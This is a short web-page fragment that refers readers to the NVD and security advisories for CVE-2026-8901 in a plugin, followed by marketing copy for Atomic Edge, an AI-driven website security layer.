Detailed information about CVE-2026-8901 can be found on the National Vulnerability Database (NVD) and security advisory sites. Additionally, the plugin’s official documentation may provide insights into updates and security practices.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations